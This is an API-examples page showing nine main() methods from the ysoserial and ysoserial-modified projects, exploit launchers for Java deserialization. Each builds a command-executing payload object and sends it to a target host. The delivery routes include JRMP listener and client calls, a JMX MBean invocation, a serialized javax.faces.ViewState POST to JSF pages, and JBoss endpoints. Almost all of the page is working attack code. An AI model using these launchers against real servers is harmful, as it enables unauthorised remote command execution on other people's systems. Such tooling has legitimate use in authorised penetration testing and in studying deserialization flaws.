Java Code Examples for ysoserial.payloads.ObjectPayload.Utils#makePayloadObject()

The following examples show how to use ysoserial.payloads.ObjectPayload.Utils#makePayloadObject() . You can vote up the ones you like or vote down the ones you don't like, and go to the original project or source file by following the links above each example. You may check out the related API usage on the sidebar.
Example 1
Source File: JRMPListener.java    From ysoserial-modified with MIT License 6 votes vote down vote up
public static final void main ( final String[] args ) {

        if ( args.length < 4 ) {
            System.err.println(JRMPListener.class.getName() + " <port> <payload_type> <terminal_type> <cmd_to_exec>");
            System.exit(-1);
            return;
        }
        CmdExecuteHelper cmdHelper = new CmdExecuteHelper(args[2], args[3]); 
        final Object payloadObject = Utils.makePayloadObject(args[ 1 ], cmdHelper);

        try {
            int port = Integer.parseInt(args[ 0 ]);
            System.err.println("* Opening JRMP listener on " + port);
            JRMPListener c = new JRMPListener(port, payloadObject);
            c.run();
        }
        catch ( Exception e ) {
            System.err.println("Listener error");
            e.printStackTrace(System.err);
        }
        Utils.releasePayload(args[1], payloadObject);
    }
 
Example 2
Source File: JRMPClient.java    From ysoserial-modified with MIT License 6 votes vote down vote up
public static final void main ( final String[] args ) {
    if ( args.length < 5 ) {
        System.err.println(JRMPClient.class.getName() + " <host> <port> <payload_type> <terminal_type> <cmd_to_exec>");
        System.exit(-1);
    }
    
    CmdExecuteHelper cmdHelper = new CmdExecuteHelper(args[3], args[4]);
    Object payloadObject = Utils.makePayloadObject(args[2], cmdHelper);
    String hostname = args[ 0 ];
    int port = Integer.parseInt(args[ 1 ]);
    try {
        System.err.println(String.format("* Opening JRMP socket %s:%d", hostname, port));
        makeDGCCall(hostname, port, payloadObject);
    }
    catch ( Exception e ) {
        e.printStackTrace(System.err);
    }
    Utils.releasePayload(args[2], payloadObject);
}
 
Example 3
Source File: JMXInvokeMBean.java    From ysoserial with MIT License 6 votes vote down vote up
public static void main(String[] args) throws Exception {

	if ( args.length < 4 ) {
		System.err.println(JMXInvokeMBean.class.getName() + " <host> <port> <payload_type> <payload_arg>");
		System.exit(-1);
	}
   	
	JMXServiceURL url = new JMXServiceURL("service:jmx:rmi:///jndi/rmi://" + args[0] + ":" + args[1] + "/jmxrmi");
       
	JMXConnector jmxConnector = JMXConnectorFactory.connect(url);
	MBeanServerConnection mbeanServerConnection = jmxConnector.getMBeanServerConnection();

	// create the payload
	Object payloadObject = Utils.makePayloadObject(args[2], args[3]);   
	ObjectName mbeanName = new ObjectName("java.util.logging:type=Logging");

	mbeanServerConnection.invoke(mbeanName, "getLoggerLevel", new Object[]{payloadObject}, new String[]{String.class.getCanonicalName()});

	//close the connection
	jmxConnector.close();
   }
 
Example 4
Source File: JRMPListener.java    From ysoserial with MIT License 6 votes vote down vote up
public static final void main ( final String[] args ) {

        if ( args.length < 3 ) {
            System.err.println(JRMPListener.class.getName() + " <port> <payload_type> <payload_arg>");
            System.exit(-1);
            return;
        }

        final Object payloadObject = Utils.makePayloadObject(args[ 1 ], args[ 2 ]);

        try {
            int port = Integer.parseInt(args[ 0 ]);
            System.err.println("* Opening JRMP listener on " + port);
            JRMPListener c = new JRMPListener(port, payloadObject);
            c.run();
        }
        catch ( Exception e ) {
            System.err.println("Listener error");
            e.printStackTrace(System.err);
        }
        Utils.releasePayload(args[1], payloadObject);
    }
 
Example 5
Source File: JRMPClient.java    From ysoserial with MIT License 6 votes vote down vote up
public static final void main ( final String[] args ) {
    if ( args.length < 4 ) {
        System.err.println(JRMPClient.class.getName() + " <host> <port> <payload_type> <payload_arg>");
        System.exit(-1);
    }

    Object payloadObject = Utils.makePayloadObject(args[2], args[3]);
    String hostname = args[ 0 ];
    int port = Integer.parseInt(args[ 1 ]);
    try {
        System.err.println(String.format("* Opening JRMP socket %s:%d", hostname, port));
        makeDGCCall(hostname, port, payloadObject);
    }
    catch ( Exception e ) {
        e.printStackTrace(System.err);
    }
    Utils.releasePayload(args[2], payloadObject);
}
 
Example 6
Source File: JSF.java    From ysoserial-modified with MIT License 5 votes vote down vote up
public static void main ( String[] args ) {

        if ( args.length < 4 ) {
            System.err.println(JSF.class.getName() + " <view_url> <payload_type> <terminal_type> <payload_arg>");
            System.exit(-1);
        }
        CmdExecuteHelper cmdHelper = new CmdExecuteHelper(args[2], args[3]);
        final Object payloadObject = Utils.makePayloadObject(args[ 1 ], cmdHelper);

        try {
            URL u = new URL(args[ 0 ]);

            URLConnection c = u.openConnection();
            if ( ! ( c instanceof HttpURLConnection ) ) {
                throw new IllegalArgumentException("Not a HTTP url");
            }

            HttpURLConnection hc = (HttpURLConnection) c;
            hc.setDoOutput(true);
            hc.setRequestMethod("POST");
            hc.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");
            OutputStream os = hc.getOutputStream();

            ByteArrayOutputStream bos = new ByteArrayOutputStream();
            ObjectOutputStream oos = new ObjectOutputStream(bos);
            oos.writeObject(payloadObject);
            oos.close();
            byte[] data = bos.toByteArray();
            String requestBody = "javax.faces.ViewState=" + URLEncoder.encode(Base64.encodeBase64String(data), "US-ASCII");
            os.write(requestBody.getBytes("US-ASCII"));
            os.close();

            System.err.println("Have response code " + hc.getResponseCode() + " " + hc.getResponseMessage());
        }
        catch ( Exception e ) {
            e.printStackTrace(System.err);
        }
        Utils.releasePayload(args[1], payloadObject);

    }
 
Example 7
Source File: JBoss.java    From ysoserial-modified with MIT License 5 votes vote down vote up
public static void main ( String[] args ) {
    
    if ( args.length < 4 ) {
        System.err.println("Usage " + JBoss.class.getName() + " <uri> <payload> <terminal_type> <cmd_to_execute>");
        System.exit(-1);
    }

    URI u = URI.create(args[ 0 ]);
    
    CmdExecuteHelper cmdHelper = new CmdExecuteHelper(args[2], args[3]); 

    final Object payloadObject = Utils.makePayloadObject(args[1], cmdHelper);
    
    String username = null;
    String password = null;
    if ( u.getUserInfo() != null ) {
        int sep = u.getUserInfo().indexOf(':');
        if ( sep >= 0 ) {
            username = u.getUserInfo().substring(0, sep);
            password = u.getUserInfo().substring(sep + 1);
        }
        else {
            System.err.println("Need <user>:<password>@");
            System.exit(-1);
        }
    }

    doRun(u, payloadObject, username, password);
    Utils.releasePayload(args[1], payloadObject);
}
 
Example 8
Source File: JSF.java    From ysoserial with MIT License 5 votes vote down vote up
public static void main ( String[] args ) {

        if ( args.length < 3 ) {
            System.err.println(JSF.class.getName() + " <view_url> <payload_type> <payload_arg>");
            System.exit(-1);
        }

        final Object payloadObject = Utils.makePayloadObject(args[ 1 ], args[ 2 ]);

        try {
            URL u = new URL(args[ 0 ]);

            URLConnection c = u.openConnection();
            if ( ! ( c instanceof HttpURLConnection ) ) {
                throw new IllegalArgumentException("Not a HTTP url");
            }

            HttpURLConnection hc = (HttpURLConnection) c;
            hc.setDoOutput(true);
            hc.setRequestMethod("POST");
            hc.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");
            OutputStream os = hc.getOutputStream();

            ByteArrayOutputStream bos = new ByteArrayOutputStream();
            ObjectOutputStream oos = new ObjectOutputStream(bos);
            oos.writeObject(payloadObject);
            oos.close();
            byte[] data = bos.toByteArray();
            String requestBody = "javax.faces.ViewState=" + URLEncoder.encode(Base64.encodeBase64String(data), "US-ASCII");
            os.write(requestBody.getBytes("US-ASCII"));
            os.close();

            System.err.println("Have response code " + hc.getResponseCode() + " " + hc.getResponseMessage());
        }
        catch ( Exception e ) {
            e.printStackTrace(System.err);
        }
        Utils.releasePayload(args[1], payloadObject);

    }
 
Example 9
Source File: JBoss.java    From ysoserial with MIT License 5 votes vote down vote up
public static void main ( String[] args ) {

        if ( args.length < 3 ) {
            System.err.println("Usage " + JBoss.class.getName() + " <uri> <payload> <payload_arg>");
            System.exit(-1);
        }

        URI u = URI.create(args[ 0 ]);

        final Object payloadObject = Utils.makePayloadObject(args[1], args[2]);

        String username = null;
        String password = null;
        if ( u.getUserInfo() != null ) {
            int sep = u.getUserInfo().indexOf(':');
            if ( sep >= 0 ) {
                username = u.getUserInfo().substring(0, sep);
                password = u.getUserInfo().substring(sep + 1);
            }
            else {
                System.err.println("Need <user>:<password>@");
                System.exit(-1);
            }
        }

        doRun(u, payloadObject, username, password);
        Utils.releasePayload(args[1], payloadObject);
    }